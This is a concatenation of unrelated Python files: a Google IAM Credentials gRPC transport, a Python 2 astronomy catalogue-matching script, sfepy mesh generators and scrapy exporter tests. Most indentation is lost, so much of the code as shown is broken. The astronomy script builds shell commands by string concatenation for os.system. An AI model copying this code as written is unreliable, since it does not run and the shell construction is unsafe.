``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for the grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure a mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
# use the credentials which are saved
credentials=self._credentials,
# Set ``credentials_file`` to ``None`` here as
# the credentials that we saved earlier should be used.
credentials_file=None,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@property
def grpc_channel(self) -> aio.Channel:
"""Create the channel designed to connect to this service.
This property caches on the instance; repeated calls return
the same channel.
"""
# Return the channel from cache.
return self._grpc_channel
@property
def generate_access_token(self) -> Callable[
[common.GenerateAccessTokenRequest],
Awaitable[common.GenerateAccessTokenResponse]]:
r"""Return a callable for the generate access token method over gRPC.
Generates an OAuth 2.0 access token for a service
account.
Returns:
Callable[[~.GenerateAccessTokenRequest],
Awaitable[~.GenerateAccessTokenResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'generate_access_token' not in self._stubs:
self._stubs['generate_access_token'] = self.grpc_channel.unary_unary(
'/google.iam.credentials.v1.IAMCredentials/GenerateAccessToken',
request_serializer=common.GenerateAccessTokenRequest.serialize,
response_deserializer=common.GenerateAccessTokenResponse.deserialize,
)
return self._stubs['generate_access_token']
@property
def generate_id_token(self) -> Callable[
[common.GenerateIdTokenRequest],
Awaitable[common.GenerateIdTokenResponse]]:
r"""Return a callable for the generate id token method over gRPC.
Generates an OpenID Connect ID token for a service
account.
Returns:
Callable[[~.GenerateIdTokenRequest],
Awaitable[~.GenerateIdTokenResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'generate_id_token' not in self._stubs:
self._stubs['generate_id_token'] = self.grpc_channel.unary_unary(
'/google.iam.credentials.v1.IAMCredentials/GenerateIdToken',
request_serializer=common.GenerateIdTokenRequest.serialize,
response_deserializer=common.GenerateIdTokenResponse.deserialize,
)
return self._stubs['generate_id_token']
@property
def sign_blob(self) -> Callable[
[common.SignBlobRequest],
Awaitable[common.SignBlobResponse]]:
r"""Return a callable for the sign blob method over gRPC.
Signs a blob using a service account's system-managed
private key.
Returns:
Callable[[~.SignBlobRequest],
Awaitable[~.SignBlobResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'sign_blob' not in self._stubs:
self._stubs['sign_blob'] = self.grpc_channel.unary_unary(
'/google.iam.credentials.v1.IAMCredentials/SignBlob',
request_serializer=common.SignBlobRequest.serialize,
response_deserializer=common.SignBlobResponse.deserialize,
)
return self._stubs['sign_blob']
@property
def sign_jwt(self) -> Callable[
[common.SignJwtRequest],
Awaitable[common.SignJwtResponse]]:
r"""Return a callable for the sign jwt method over gRPC.
Signs a JWT using a service account's system-managed
private key.
Returns:
Callable[[~.SignJwtRequest],
Awaitable[~.SignJwtResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'sign_jwt' not in self._stubs:
self._stubs['sign_jwt'] = self.grpc_channel.unary_unary(
'/google.iam.credentials.v1.IAMCredentials/SignJwt',
request_serializer=common.SignJwtRequest.serialize,
response_deserializer=common.SignJwtResponse.deserialize,
)
return self._stubs['sign_jwt']
def close(self):
return self.grpc_channel.close()
__all__ = (
'IAMCredentialsGrpcAsyncIOTransport',
)
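# Hedged usage sketch (not part of the generated file): normally this
# transport is constructed internally by the async client, but it can be
# instantiated directly. The service-account name below is a placeholder.
#
#   transport = IAMCredentialsGrpcAsyncIOTransport()
#   request = common.GenerateAccessTokenRequest(
#       name='projects/-/serviceAccounts/sa-name@project-id.iam.gserviceaccount.com',
#       scope=['https://www.googleapis.com/auth/cloud-platform'],
#   )
#   response = await transport.generate_access_token(request)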
|
|
class file_iter:
def __init__(self,name):
self.name = name
self.suffix = 1
self.file = self.name + str(self.suffix)
def next(self):
self.suffix += 1
self.file = self.name + str(self.suffix)
return self.file
    def __iter__(self):
        self.file = self.name + str(self.suffix)
        return self
def match_list(line,dict_list):
dict = {}
    res = re.split(r'\s+', line)
if res[0] == '':
res = res[1:]
#print res, dict_list
#print len(res), len(dict_list)
for i in range(len(dict_list)):
#print dict_list[i], res[i]
dict[dict_list[i]] = res[i]
return dict
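# Hedged example of match_list on a whitespace-separated catalogue row:
#   match_list(' 1 340.8501 -9.58396', ['SeqNr', 'RA', 'DEC'])
#   -> {'SeqNr': '1', 'RA': '340.8501', 'DEC': '-9.58396'}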
def run(command,to_delete=[]):
import os
for file in to_delete:
os.system('rm ' + file)
print command
#raw_input()
os.system(command)
def special_objects():
positions = [[340.82517,-9.59653,'faint_arc'],[340.8501,-9.58396,'main_knot_bright'],[340.84933,-9.58306,'lower_knot_bright'],[340.84933,-9.58306,'upper_knot_bright']]
tempfile = '/tmp/tmppos'
tempcat = '/tmp/tmpcat.cat'
tempconf = '/tmp/tmpconf.conf'
tmp = open(tempfile,'w')
tmp_ind = 0
for ps in positions:
tmp_ind += 1
tmp.write(str(tmp_ind) + ' ' + str(ps[0]) + ' ' + str(ps[1]) + '\n')
tmp.close()
tf = open(tempconf,'w')
tf.write(\
'COL_NAME = SeqNr\nCOL_TTYPE = LONG\nCOL_HTYPE = INT\nCOL_COMM = ""\nCOL_UNIT = ""\nCOL_DEPTH = 1\n#\n'\
+ 'COL_NAME = ALPHA_J2000\nCOL_TTYPE = DOUBLE\nCOL_HTYPE = FLOAT\nCOL_COMM = ""\nCOL_UNIT = ""\nCOL_DEPTH = 1\n#\n'\
+ 'COL_NAME = DELTA_J2000\nCOL_TTYPE = DOUBLE\nCOL_HTYPE = FLOAT\nCOL_COMM = ""\nCOL_UNIT = ""\nCOL_DEPTH = 1\n#\n'\
)
#+ 'COL_NAME = OBJECT\nCOL_TTYPE = STRING\nCOL_HTYPE = STRING\nCOL_COMM = ""\nCOL_UNIT = ""\nCOL_DEPTH = 128\n'\
tf.close()
run('asctoldac -i ' + tempfile + ' -o ' + tempcat + ' -c ' + tempconf + ' -t STDTAB',[tempcat] )
return tempcat
def convert_spectra(specfile):
run("ldacrentab -i " + specfile.file + " -t OBJECTS STDTAB FIELDS NULL -o " + specfile.next(),[specfile.file])
run("ldacrenkey -i " + specfile.file + " -t STDTAB -k Ra ALPHA_J2000 Dec DELTA_J2000 Z z -o " + specfile.next(),[specfile.file])
run("ldaccalc -i " + specfile.file + " -t STDTAB -c '(Nr);' -k LONG -n SeqNr '' -o " + specfile.next(),[specfile.file] )
return specfile
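# Hedged illustration of the file_iter naming scheme used above:
#   f = file_iter('/tmp/demo')   # f.file == '/tmp/demo1'
#   f.next()                     # returns '/tmp/demo2' and updates f.file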
from config_bonn import cluster, tag, arc, magnitude, filters, spectra,area
import sys, os, re
spec = 'yes'
arc_calc = 'no'
everything = 'no'
caltable = '/tmp/' + cluster + 'output.cat' #sys.argv[1]
caltablearc = '/tmp/' + cluster + 'output.arc.cat' #sys.argv[1]
#spectra = '/tmp/0911.cat' # 'M2243_spectra.cat' #sys.argv[2]
ppid = str(os.getppid())
calrename1 = '/tmp/cal1' #
#filters = ['W-J-B','W-J-V','W-C-RC','W-C-IC','W-S-Z+']
if spec == 'yes':
''' rename tables '''
##os.system("ldacrentab -i " + caltable + " -t OBJECTS STDTAB FIELDS NULL -o " + calrename1)
specfile = file_iter('/tmp/' + cluster + 'spec')
os.system('cp ' + spectra + ' ' + specfile.file)
specfile = convert_spectra(specfile)
print spectra
matchspec = '/tmp/' + cluster + 'matchspec'
matchspecfilt_first = '/tmp/' + cluster + 'matchspec.first.filt'
matchspecfilt = '/tmp/' + cluster + 'matchspec.filt'
print "match_neighbor.sh " + matchspec + " STDTAB " + specfile.file + " spec " + caltable + " data "
run("match_neighbor.sh " + matchspec + " STDTAB " + specfile.file + " spec " + caltable + " data ", [matchspec])
#print "ldacfilter -i " + matchspec + " -c '((z_spec != 0) AND (SeqNr_data != 0));' -t STDTAB -o " + matchspecfilt
run("ldacfilter -i " + matchspec + " -c '((z_spec != 0) AND (SeqNr_data != 0));' -t STDTAB -o " + matchspecfilt_first ,[matchspecfilt_first])
listcond = []
for filter in filters:
listcond.append('Flag_'+filter + "_data = 0)")
listcond.append('IMAFLAGS_ISO_'+filter + "_data = 0)")
#listcond.append('BackGr_'+filter + " > 0.00000001)")
filt= '(' + reduce(lambda x,y: '(' + x + ' AND (' + y + ')',listcond)
print filt
command = 'ldacfilter -i ' + matchspecfilt_first + ' -t STDTAB -o ' + matchspecfilt + ' -c "' + filt + ';" '
print command
run(command,[matchspecfilt])
#run("ldacfilter -i " + matchspecfilt_first + " -c '((N_00 = 0) AND (N_01 = 1));' -t STDTAB -o " + matchspecfilt ,[matchspecfilt])
#####command="ldacfilter -i " + outputtable + " -c '(OldSeqNr != 0);' -t STDTAB -o " + outputtablefilt
#specialobjs = special_objects()
#matchobj = '/tmp/matchobj'
matchobjfilt = '/tmp/' + cluster + 'matchobj.filt'
#run("match.sh " + matchobj + " STDTAB " + specialobjs + " obj " + caltable + " data ", [matchobj])
#run("ldacfilter -i " + matchobj + " -c '((ALPHA_J2000_obj != 0) AND (SeqNr_data != 0));' -t STDTAB -o " + matchobjfilt, [matchobjfilt])
#seqnrs = [87657,91866,91073,92484]
#conditionals = ['SeqNr=' + str(x) + ')' for x in seqnrs]
#filt= '(' + reduce(lambda x,y: '(' + x + ' OR (' + y + ')',conditionals)
#matchobjfilt = '/tmp/matchobj.filt'
#run('ldacfilter -i ' + caltablearc + ' -t STDTAB -o ' + matchobjfilt + ' -c "' + filt + ';" ')
''' make list of parameters to read out to photoz input file '''
mag_name = 'Mag_'
magerr_name = 'MAGERR_APER1'
dict_list = []
dict_list_obj = []
dict_list_nomat = []
print_list = []
print_list_obj = []
print_list_nomat = []
for filter in filters:
dict_list.append(mag_name + filter + '_data')
dict_list.append(magerr_name + '_' + filter + '_data')
print_list.append([mag_name + filter + '_data', magerr_name + '_' + filter + '_data'])
mag_name = 'MAG_SPEC_'
magerr_name = 'MAGERR_SPEC'
for filter in filters:
dict_list_obj.append(mag_name + filter )
dict_list_obj.append(magerr_name + '_' + filter )
print_list_obj.append([mag_name + filter , magerr_name + '_' + filter ])
mag_name = 'Mag_'
magerr_name = 'MAGERR_APER2'
for filter in filters:
dict_list_nomat.append(mag_name + filter )
dict_list_nomat.append(magerr_name + '_' + filter )
dict_list_nomat.append('Thresh_' + filter )
#dict_list_nomat.append('FLUX_AUTO_' + filter )
dict_list_nomat.append('Flag_' + filter )
dict_list_nomat.append('BackGr_' + filter )
dict_list_nomat.append('IMAFLAGS_ISO_' + filter )
print_list_nomat.append([mag_name + filter , magerr_name + '_' + filter, 'Thresh_' + filter, 'IMAFLAGS_ISO_' + filter ])
list_spec = dict_list + ['z_spec','ALPHA_J2000_spec','ALPHA_J2000_data','DELTA_J2000_spec','DELTA_J2000_data','SeqNr_spec','SeqNr_data']
list_obj = dict_list_obj + ['ALPHA_J2000','ALPHA_J2000','DELTA_J2000','DELTA_J2000','SeqNr']
list_nomat = dict_list_nomat + ['ALPHA_J2000','ALPHA_J2000','DELTA_J2000','DELTA_J2000','SeqNr']
keys_spec = " ".join(list_spec)
keys_obj = " ".join(list_obj)
keys_nomat = " ".join(list_nomat)
os.system('rm /tmp/' + cluster + 'out.cat')
tempz = '/tmp/' + cluster + 'tempz'
if spec == 'yes':
out = open('/tmp/' + cluster + 'out.cat','w')
radec = '/tmp/' + cluster + 'radec.cat'
outradec = open(radec,'w')
''' write out spectra w/ magnitudes '''
run("ldactoasc -b -i " + matchspecfilt + " -t STDTAB -k " + keys_spec + " > " + tempz, [tempz])
ll = open(tempz,'r').readlines()
#out = open('/tmp/out.cat','w')
for line in ll:
dict = match_list(line,list_spec)
stg = str(dict['SeqNr_data']) + " "
for pair in print_list:
if float(dict[pair[0]]) > 40: # see if object is detected
stg += "0\t999\t"
else:
err = dict[pair[1]]
if float(err) < 0.03: err = 0.03
stg += "\t%(var1).3f\t%(var2).3f\t" % {'var1':float(dict[pair[0]]),'var2':float(err)}
z_spec = "%(var1).3f" % {'var1':float(dict['z_spec'])}
if float(dict['z_spec']) != 0:
stg += "\t0\t" + z_spec + "\tComment\t" #+ dict['ALPHA_J2000_spec'] + " " + dict['ALPHA_J2000_data']
out.write(stg+ "\n")
outradec.write( dict['ALPHA_J2000_spec'] + " " + dict['DELTA_J2000_spec'] + '\n')
outradec.close()
os.system('mkreg.pl -xcol 0 -ycol 1 -c -rad 5 -wcs -colour red ' + radec)
if arc_calc == 'yes':
''' write out objects w/ magnitudes '''
run("ldactoasc -b -i " + caltablearc + " -t STDTAB -k " + keys_obj + " > " + tempz, [tempz])
ll = open(tempz,'r').readlines()
for line in ll:
dict = match_list(line,list_obj)
stg = str(dict['SeqNr']) + "\t"
for pair in print_list_obj:
if float(dict[pair[0]]) > 40: # see if object is detected
stg += " 0 999"
else:
err = float(dict[pair[1]])
if err < 0.05: err = 0.05
stg += "\t" + str(dict[pair[0]]) + "\t" + str(err) + "\t"
#out.write(stg+ '\n')
if everything == 'yes':
listcond = []
for filter in filters:
listcond.append('Flag_'+filter + " = 0)")
#listcond.append('BackGr_'+filter + " > 0.00000001)")
filt= '(' + reduce(lambda x,y: '(' + x + ' AND (' + y + ')',listcond)
print filt
command = 'ldacfilter -i ' + caltable + ' -t STDTAB -o /tmp/' + cluster + 'caltable -c "' + filt + ';" '
print command
print '\n\n\n\n'
#os.system(command)
#skipping FILTER!!!!
os.system('cp ' + caltable + ' /tmp/' + cluster + 'caltable')
ofile = '/tmp/' + cluster + 'out.cat'
out = open(ofile,'w')
''' write out objects w/ magnitudes '''
run("ldactoasc -b -i /tmp/" + cluster + "caltable -t STDTAB -k " + keys_nomat + " > " + tempz, [tempz])
ll = open(tempz,'r').readlines()
    import math
    for line in ll:
        dict = match_list(line,list_nomat)
        stg = str(dict['SeqNr']) + "\t"
for pair in print_list_nomat:
detect_mag = (2.5 * math.log10(area) + float(dict[pair[2]]))
flag = int(dict[pair[3]])
if flag != 0: # if something is wrong with photometry, leave out constraint
stg += " 0 999"
elif float(dict[pair[0]]) > detect_mag: # see if object is detected, if not put detection limit
#stg += str(detect_mag) + " -1 "
stg += "\t%(var1).3f\t%(var2).3f\t" % {'var1':detect_mag - 0.75,'var2':-1}
else:
err = float(dict[pair[1]])
if err < 0.05: err = 0.05
stg += "\t" + str(dict[pair[0]]) + "\t" + str(err) + "\t"
#stg += "\t" + dict['ALPHA_J2000'] + " " + dict['DELTA_J2000'] + ' ' + dict['Flag_W-C-IC']
out.write(stg+ '\n')
out.close()
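# Hedged note on the photo-z input written above: each line of
# /tmp/<cluster>out.cat starts with SeqNr, followed by one (mag, err) pair per
# filter, with '0 999' standing in for non-detections; spectroscopic rows end
# with '0 <z_spec> Comment'.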
|
|
from sfepy.base.base import *
from sfepy.base.progressbar import MyBar
from sfepy.linalg import cycle
from sfepy.fem import Mesh
def gen_block_mesh(dims, shape, centre, name='block'):
"""Generate a 2D or 3D block mesh. The dimension is determined by the
lenght of the shape argument.
Parameters
----------
dims : array of 2 or 3 floats
Dimensions of the block.
shape : array of 2 or 3 ints
Shape (counts of nodes in x, y, z) of the block mesh.
centre : array of 2 or 3 floats
Centre of the block.
name : string
Mesh name.
Returns
-------
mesh : Mesh instance
"""
dim = shape.shape[0]
centre = centre[:dim]
dims = dims[:dim]
x0 = centre - 0.5 * dims
dd = dims / (shape - 1)
grid = nm.zeros( shape, dtype = nm.int32 )
n_nod = nm.prod( shape )
coors = nm.zeros( (n_nod, dim), dtype = nm.float64 )
bar = MyBar( " nodes:" )
bar.init( n_nod )
for ii, ic in enumerate( cycle( shape ) ):
grid[tuple(ic)] = ii
coors[ii] = x0 + ic * dd
if not (ii % 100):
bar.update( ii )
bar.update(ii + 1)
n_el = nm.prod( shape - 1 )
mat_id = nm.zeros( (n_el,), dtype = nm.int32 )
if (dim == 2):
conn = nm.zeros( (n_el, 4), dtype = nm.int32 )
bar = MyBar( " elements:" )
bar.init( n_el )
for ii, (ix, iy) in enumerate( cycle( shape - 1 ) ):
conn[ii,:] = [grid[ix ,iy], grid[ix+1,iy ],
grid[ix+1,iy+1], grid[ix ,iy+1]]
if not (ii % 100):
bar.update( ii )
bar.update(ii + 1)
desc = '2_4'
else:
conn = nm.zeros( (n_el, 8), dtype = nm.int32 )
bar = MyBar( " elements:" )
bar.init( n_el )
for ii, (ix, iy, iz) in enumerate( cycle( shape - 1 ) ):
conn[ii,:] = [grid[ix ,iy ,iz ], grid[ix+1,iy ,iz ],
grid[ix+1,iy+1,iz ], grid[ix ,iy+1,iz ],
grid[ix ,iy ,iz+1], grid[ix+1,iy ,iz+1],
grid[ix+1,iy+1,iz+1], grid[ix ,iy+1,iz+1]]
if not (ii % 100):
bar.update( ii )
bar.update(ii + 1)
desc = '3_8'
mesh = Mesh.from_data(name, coors, None, [conn], [mat_id], [desc])
return mesh
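# Quick hedged sanity check of gen_block_mesh: for shape (3, 3) it creates
# 3 * 3 = 9 nodes and (3 - 1) * (3 - 1) = 4 quadrilateral '2_4' elements.
#   m = gen_block_mesh(nm.array([1.0, 1.0]), nm.array([3, 3]), nm.array([0.0, 0.0]))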
def gen_cylinder_mesh(dims, shape, centre, axis='x', force_hollow=False,
is_open=False, open_angle=0.0, non_uniform=False,
name='cylinder'):
"""Generate a cylindrical mesh along an axis. Its cross-section can be
ellipsoidal.
Parameters
----------
    dims : array of 5 floats
        Dimensions of the cylinder: inner surface semi-axes a1, b1, outer
        surface semi-axes a2, b2, length.
    shape : array of 3 ints
        Shape (counts of nodes in radial, circumferential and longitudinal
        directions) of the cylinder mesh.
    centre : array of 3 floats
        Centre of the cylinder.
    axis : one of 'x', 'y', 'z'
        The axis of the cylinder.
force_hollow : boolean
Force hollow mesh even if inner radii a1 = b1 = 0.
is_open : boolean
Generate an open cylinder segment.
open_angle : float
Opening angle in radians.
non_uniform : boolean
If True, space the mesh nodes in radial direction so that the element
volumes are (approximately) the same, making thus the elements towards
the outer surface thinner.
name : string
Mesh name.
Returns
-------
mesh : Mesh instance
"""
a1, b1, a2, b2, length = dims
nr, nfi, nl = shape
origin = centre - nm.array([0.5 * length, 0.0, 0.0])
da = (a2 - a1) / (nr - 1)
db = (b2 - b1) / (nr - 1)
dfi = 2.0 * (nm.pi - open_angle) / nfi
if is_open:
nnfi = nfi + 1
else:
nnfi = nfi
is_hollow = force_hollow or not (max(abs(a1), abs(b1)) < 1e-15)
if is_hollow:
mr = 0
else:
mr = (nnfi - 1) * nl
grid = nm.zeros((nr, nnfi, nl), dtype=nm.int32)
n_nod = nr * nnfi * nl - mr
coors = nm.zeros((n_nod, 3), dtype=nm.float64)
angles = nm.linspace(open_angle, open_angle+(nfi)*dfi, nfi+1)
xs = nm.linspace(0.0, length, nl)
if non_uniform:
ras = nm.zeros((nr,), dtype=nm.float64)
rbs = nm.zeros_like(ras)
advol = (a2**2 - a1**2) / (nr - 1)
bdvol = (b2**2 - b1**2) / (nr - 1)
ras[0], rbs[0] = a1, b1
for ii in range(1, nr):
ras[ii] = nm.sqrt(advol + ras[ii-1]**2)
rbs[ii] = nm.sqrt(bdvol + rbs[ii-1]**2)
else:
ras = nm.linspace(a1, a2, nr)
rbs = nm.linspace(b1, b2, nr)
## print dfi * 180.0 / nm.pi
## print angles * 180.0 / nm.pi
## print xs
## print ras
## print rbs
# This is 3D only...
bar = MyBar( " nodes:" )
bar.init( n_nod )
ii = 0
for ix in range(nr):
a, b = ras[ix], rbs[ix]
for iy, fi in enumerate(angles[:nnfi]):
# print iy, fi * 180.0 / nm.pi
for iz, x in enumerate(xs):
## print ix, iy, iz, ii
grid[ix,iy,iz] = ii
coors[ii] = origin + [x, a * nm.cos(fi), b * nm.sin(fi)]
if not (ii % 100):
bar.update( ii )
ii += 1
if not is_hollow and (ix == 0):
if iy > 0:
grid[ix,iy,iz] = grid[ix,0,iz]
ii -= 1
print
assert_(ii == n_nod)
n_el = (nr - 1) * nnfi * (nl - 1)
conn = nm.zeros((n_el, 8), dtype=nm.int32)
bar = MyBar( " elements:" )
bar.init(n_el)
ii = 0
for (ix, iy, iz) in cycle([nr-1, nnfi, nl-1]):
# print ii, ix, iy, iz
if iy < (nnfi - 1):
conn[ii,:] = [grid[ix ,iy ,iz ], grid[ix+1,iy ,iz ],
grid[ix+1,iy+1,iz ], grid[ix ,iy+1,iz ],
grid[ix ,iy ,iz+1], grid[ix+1,iy ,iz+1],
grid[ix+1,iy+1,iz+1], grid[ix ,iy+1,iz+1]]
ii += 1
elif not is_open:
conn[ii,:] = [grid[ix ,iy ,iz ], grid[ix+1,iy ,iz ],
grid[ix+1,0,iz ], grid[ix ,0,iz ],
grid[ix ,iy ,iz+1], grid[ix+1,iy ,iz+1],
grid[ix+1,0,iz+1], grid[ix ,0,iz+1]]
ii += 1
if not (ii % 100):
bar.update( ii )
print
mat_id = nm.zeros( (n_el,), dtype = nm.int32 )
desc = '3_8'
## print n_nod, n_el, conn.max()
assert_(n_nod == (conn.max() + 1))
if axis == 'z':
coors = coors[:,[1,2,0]]
elif axis == 'y':
coors = coors[:,[2,0,1]]
mesh = Mesh.from_data(name, coors, None, [conn], [mat_id], [desc])
return mesh
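# Hedged note on the node count used above: for a solid (a1 = b1 = 0) closed
# cylinder the (nnfi - 1) * nl duplicated axis nodes per slice are merged
# away, so n_nod = nr * nnfi * nl - (nnfi - 1) * nl.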
def main():
mesh = gen_block_mesh(nm.array((1.0, 2.0, 3.0)),
nm.array((10,10,10)), nm.array((1.0, 2.0, 3.0)),
name='')
mesh.write('0.mesh', io = 'auto' )
mesh = gen_cylinder_mesh(nm.array((1.0, 1.0, 2.0, 2.0, 3)),
nm.array((10,10,10)), nm.array((1.0, 2.0, 3.0)),
is_open=False, open_angle = 0.0,
name='')
mesh.write('1.mesh', io = 'auto' )
mesh = gen_cylinder_mesh(nm.array((1.0, 1.0, 2.0, 2.0, 3)),
nm.array((10,10,10)), nm.array((1.0, 2.0, 3.0)),
is_open=True, open_angle = 0.0,
name='')
mesh.write('2.mesh', io = 'auto' )
mesh = gen_cylinder_mesh(nm.array((1.0, 1.0, 2.0, 2.0, 3)),
nm.array((10,10,10)), nm.array((1.0, 2.0, 3.0)),
is_open=True, open_angle = 0.5,
name='')
mesh.write('3.mesh', io = 'auto' )
mesh = gen_cylinder_mesh(nm.array((0.0, 0.0, 2.0, 2.0, 3)),
nm.array((10,10,10)), nm.array((1.0, 2.0, 3.0)),
is_open=False, open_angle = 0.0,
name='')
mesh.write('4.mesh', io = 'auto' )
mesh = gen_cylinder_mesh(nm.array((0.0, 0.0, 1.0, 2.0, 3)),
nm.array((10,10,10)), nm.array((1.0, 2.0, 3.0)),
is_open=True, open_angle = 0.5,
name='')
mesh.write('5.mesh', io = 'auto' )
mesh = gen_cylinder_mesh(nm.array((0.0, 0.0, 1.0, 2.0, 3)),
nm.array((10,10,10)), nm.array((1.0, 2.0, 3.0)),
is_open=True, open_angle = 0.5, non_uniform=True,
name='')
mesh.write('6.mesh', io = 'auto' )
mesh = gen_cylinder_mesh(nm.array((0.5, 0.5, 1.0, 2.0, 3)),
nm.array((10,10,10)), nm.array((1.0, 2.0, 3.0)),
is_open=True, open_angle = 0.5, non_uniform=True,
name='')
mesh.write('7.mesh', io = 'auto' )
if __name__ == '__main__':
main()
|
|
import unittest, json
from io import BytesIO
from six.moves import cPickle as pickle
import lxml.etree
import re
from scrapy.item import Item, Field
from scrapy.utils.python import str_to_unicode
from scrapy.contrib.exporter import BaseItemExporter, PprintItemExporter, \
PickleItemExporter, CsvItemExporter, XmlItemExporter, JsonLinesItemExporter, \
JsonItemExporter, PythonItemExporter
class TestItem(Item):
name = Field()
age = Field()
class BaseItemExporterTest(unittest.TestCase):
def setUp(self):
self.i = TestItem(name=u'John\xa3', age='22')
self.output = BytesIO()
self.ie = self._get_exporter()
def _get_exporter(self, **kwargs):
return BaseItemExporter(**kwargs)
def _check_output(self):
pass
def _assert_expected_item(self, exported_dict):
for k, v in exported_dict.items():
exported_dict[k] = str_to_unicode(v)
self.assertEqual(self.i, exported_dict)
def test_export_item(self):
self.ie.start_exporting()
try:
self.ie.export_item(self.i)
except NotImplementedError:
if self.ie.__class__ is not BaseItemExporter:
raise
self.ie.finish_exporting()
self._check_output()
def test_serialize_field(self):
self.assertEqual(self.ie.serialize_field( \
self.i.fields['name'], 'name', self.i['name']), 'John\xc2\xa3')
self.assertEqual( \
self.ie.serialize_field(self.i.fields['age'], 'age', self.i['age']), '22')
def test_fields_to_export(self):
ie = self._get_exporter(fields_to_export=['name'])
self.assertEqual(list(ie._get_serialized_fields(self.i)), [('name', 'John\xc2\xa3')])
ie = self._get_exporter(fields_to_export=['name'], encoding='latin-1')
name = list(ie._get_serialized_fields(self.i))[0][1]
assert isinstance(name, str)
self.assertEqual(name, 'John\xa3')
def test_field_custom_serializer(self):
def custom_serializer(value):
return str(int(value) + 2)
class CustomFieldItem(Item):
name = Field()
age = Field(serializer=custom_serializer)
i = CustomFieldItem(name=u'John\xa3', age='22')
ie = self._get_exporter()
self.assertEqual(ie.serialize_field(i.fields['name'], 'name', i['name']), 'John\xc2\xa3')
self.assertEqual(ie.serialize_field(i.fields['age'], 'age', i['age']), '24')
class PythonItemExporterTest(BaseItemExporterTest):
def _get_exporter(self, **kwargs):
return PythonItemExporter(**kwargs)
def test_nested_item(self):
i1 = TestItem(name=u'Joseph', age='22')
i2 = TestItem(name=u'Maria', age=i1)
i3 = TestItem(name=u'Jesus', age=i2)
ie = self._get_exporter()
exported = ie.export_item(i3)
self.assertEqual(type(exported), dict)
self.assertEqual(exported, {'age': {'age': {'age': '22', 'name': u'Joseph'}, 'name': u'Maria'}, 'name': 'Jesus'})
self.assertEqual(type(exported['age']), dict)
self.assertEqual(type(exported['age']['age']), dict)
def test_export_list(self):
i1 = TestItem(name=u'Joseph', age='22')
i2 = TestItem(name=u'Maria', age=[i1])
i3 = TestItem(name=u'Jesus', age=[i2])
ie = self._get_exporter()
exported = ie.export_item(i3)
self.assertEqual(exported, {'age': [{'age': [{'age': '22', 'name': u'Joseph'}], 'name': u'Maria'}], 'name': 'Jesus'})
self.assertEqual(type(exported['age'][0]), dict)
self.assertEqual(type(exported['age'][0]['age'][0]), dict)
def test_export_item_dict_list(self):
i1 = TestItem(name=u'Joseph', age='22')
i2 = dict(name=u'Maria', age=[i1])
i3 = TestItem(name=u'Jesus', age=[i2])
ie = self._get_exporter()
exported = ie.export_item(i3)
self.assertEqual(exported, {'age': [{'age': [{'age': '22', 'name': u'Joseph'}], 'name': u'Maria'}], 'name': 'Jesus'})
self.assertEqual(type(exported['age'][0]), dict)
self.assertEqual(type(exported['age'][0]['age'][0]), dict)
class PprintItemExporterTest(BaseItemExporterTest):
def _get_exporter(self, **kwargs):
return PprintItemExporter(self.output, **kwargs)
def _check_output(self):
self._assert_expected_item(eval(self.output.getvalue()))
class PickleItemExporterTest(BaseItemExporterTest):
def _get_exporter(self, **kwargs):
return PickleItemExporter(self.output, **kwargs)
def _check_output(self):
self._assert_expected_item(pickle.loads(self.output.getvalue()))
def test_export_multiple_items(self):
i1 = TestItem(name='hello', age='world')
